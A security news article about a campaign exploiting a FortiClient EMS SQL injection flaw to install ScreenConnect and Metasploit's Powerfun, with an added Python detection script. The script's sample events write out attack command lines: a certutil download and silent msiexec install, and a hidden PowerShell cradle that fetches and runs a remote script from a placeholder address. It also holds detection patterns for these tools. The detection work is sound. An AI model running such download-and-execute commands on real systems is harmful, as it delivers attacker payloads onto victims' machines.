Cybersecurity researchers have discovered a new campaign that is exploiting a recently disclosed security flaw in Fortinet FortiClient EMS devices to deliver ScreenConnect and Metasploit Powerfun payloads.
The activity involves the exploitation of CVE-2023-48788 (CVSS score: 9.3), a critical SQL injection flaw that could allow an unauthenticated attacker to execute unauthorized code or commands via specially crafted requests.
Cybersecurity firm Forescout is tracking the campaign under the codename Connect:fun, owing to the use of ScreenConnect and Powerfun for post-exploitation.
The intrusion targeted an unnamed media company whose vulnerable FortiClient EMS device was exposed to the internet shortly after the release of a proof-of-concept (PoC) exploit for the flaw on March 21, 2024.
Over the next couple of days, the unknown adversary was observed leveraging the flaw in unsuccessful attempts to download ScreenConnect and then install the remote desktop software using the msiexec utility.
However, on March 25, the PoC exploit was used to launch PowerShell code that downloaded Metasploit's Powerfun script and initiated a reverse connection to another IP address.
Also detected were SQL statements designed to download ScreenConnect from a remote domain ("ursketz[.]com") using certutil; the package was then installed via msiexec before connections were established with a command-and-control (C2) server.
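The certutil and msiexec chain described above, as detection logic run over constructed process-creation events. This is an added example, not Forescout's, Fortinet's or the article's code. It assumes that FortiClient EMS's backend is Microsoft SQL Server, so that OS commands obtained through the injection show up as child processes of sqlservr.exe, and that telemetry arrives as Sysmon-style process-creation events reduced to a few fields; the sample events, PIDs and addresses are constructed for the example and use documentation IP ranges rather than the domain named in the article.

```python
"""Hunt for the SQL-injection -> certutil -> msiexec chain in process telemetry.

Added example, not Forescout's or Fortinet's code. Assumptions:
  * FortiClient EMS runs on Microsoft SQL Server, so OS commands obtained
    through the injection surface as children of sqlservr.exe (assumed name).
  * Events are Sysmon-style process-creation records reduced to
    pid / ppid / image / parent_image / command_line.
  * SAMPLE_EVENTS below are constructed; URLs use documentation addresses.
"""
import re
from dataclasses import dataclass

SQL_SERVER = "sqlservr.exe"                      # assumed EMS database engine
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Behaviours from the article: certutil as a downloader, msiexec installing
# the fetched package, PowerShell fetching a remote script (Powerfun).
CERTUTIL_DL = re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*https?://", re.I)
MSIEXEC_INST = re.compile(r"msiexec(\.exe)?\b.*\s/(i|package)\b", re.I)
PS_CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|-enc\b", re.I)


@dataclass
class Finding:
    pid: int
    severity: str        # "high" = inside sqlservr.exe lineage, else "medium"
    reasons: list
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze(events):
    """Return one Finding per suspicious event, in input (time) order."""
    tainted = set()      # PIDs that descend from sqlservr.exe, transitively
    findings = []
    for ev in events:
        image, parent = basename(ev["image"]), basename(ev["parent_image"])
        cmd = ev["command_line"]
        in_lineage = parent == SQL_SERVER or ev["ppid"] in tainted
        if in_lineage:
            tainted.add(ev["pid"])
        reasons = []
        if parent == SQL_SERVER:
            # A database engine spawning a shell is the injection-to-RCE tell.
            reasons.append(f"{SQL_SERVER} spawned {image}")
        if CERTUTIL_DL.search(cmd):
            reasons.append("certutil used as a downloader")
        if MSIEXEC_INST.search(cmd):
            reasons.append("msiexec package install")
        if image in SHELLS and PS_CRADLE.search(cmd):
            reasons.append("PowerShell download cradle")
        if reasons:
            # The tool patterns alone are noisy; lineage from SQL Server is
            # what raises them to high.
            findings.append(Finding(ev["pid"], "high" if in_lineage else "medium", reasons, cmd))
    return findings


def ev(pid, ppid, image, parent, cmd):
    return {"pid": pid, "ppid": ppid, "image": image, "parent_image": parent, "command_line": cmd}


SYS = r"C:\Windows\System32"
SAMPLE_EVENTS = [  # constructed for this example
    ev(1200, 600, r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe", SYS + r"\services.exe",
       "sqlservr.exe -sFCEMS"),
    ev(2001, 1200, SYS + r"\cmd.exe", r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
       r"cmd.exe /c certutil.exe -urlcache -split -f http://203.0.113.5/sc.msi C:\Windows\Temp\sc.msi"),
    ev(2002, 2001, SYS + r"\certutil.exe", SYS + r"\cmd.exe",
       r"certutil.exe -urlcache -split -f http://203.0.113.5/sc.msi C:\Windows\Temp\sc.msi"),
    ev(2003, 1200, SYS + r"\cmd.exe", r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
       r"cmd.exe /c msiexec /i C:\Windows\Temp\sc.msi /quiet"),
    ev(2004, 2003, SYS + r"\msiexec.exe", SYS + r"\cmd.exe", r"msiexec /i C:\Windows\Temp\sc.msi /quiet"),
    ev(2010, 1200, SYS + r"\WindowsPowerShell\v1.0\powershell.exe",
       r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
       "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/powerfun.ps1')\""),
    ev(3000, 900, SYS + r"\msiexec.exe", r"C:\Windows\explorer.exe", r"msiexec.exe /i C:\Users\jdoe\Downloads\tool.msi"),
    ev(3001, 900, SYS + r"\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
]


def run_demo():
    return analyze(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in run_demo():
        print(f"[{f.severity.upper():6}] pid={f.pid} {'; '.join(f.reasons)}\n         {f.command_line}")
```

The interactive msiexec run from explorer.exe is reported only as medium: certutil and msiexec are legitimate administrative tools, so the signal worth paging on is the lineage from the database engine, which a SQL Server in its normal role should never produce.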
There is evidence to suggest that the threat actor behind it has been active since at least 2022, specifically singling out Fortinet appliances and using the Vietnamese and German languages in their infrastructure.
"The observed activity clearly has a manual component evidenced by all the failed attempts to download and install tools, as well as the relatively long time taken between attempts," security researcher Sai Molige said.
“This is evidence that this activity is part of a specific campaign, rather than an exploit included in automated cybercriminal botnets. From our observations, it appears that the actors behind this campaign are not mass scanning but choosing target environments that have VPN appliances.”
Forescout said the attack shares tactical and infrastructure overlaps with other incidents documented by Palo Alto Networks Unit 42 and Blumira in March 2024 that involve the abuse of CVE-2023-48788 to download ScreenConnect and Atera.
Organizations are advised to apply the patches provided by Fortinet, monitor for suspicious traffic, and use a web application firewall (WAF) to block potentially malicious requests.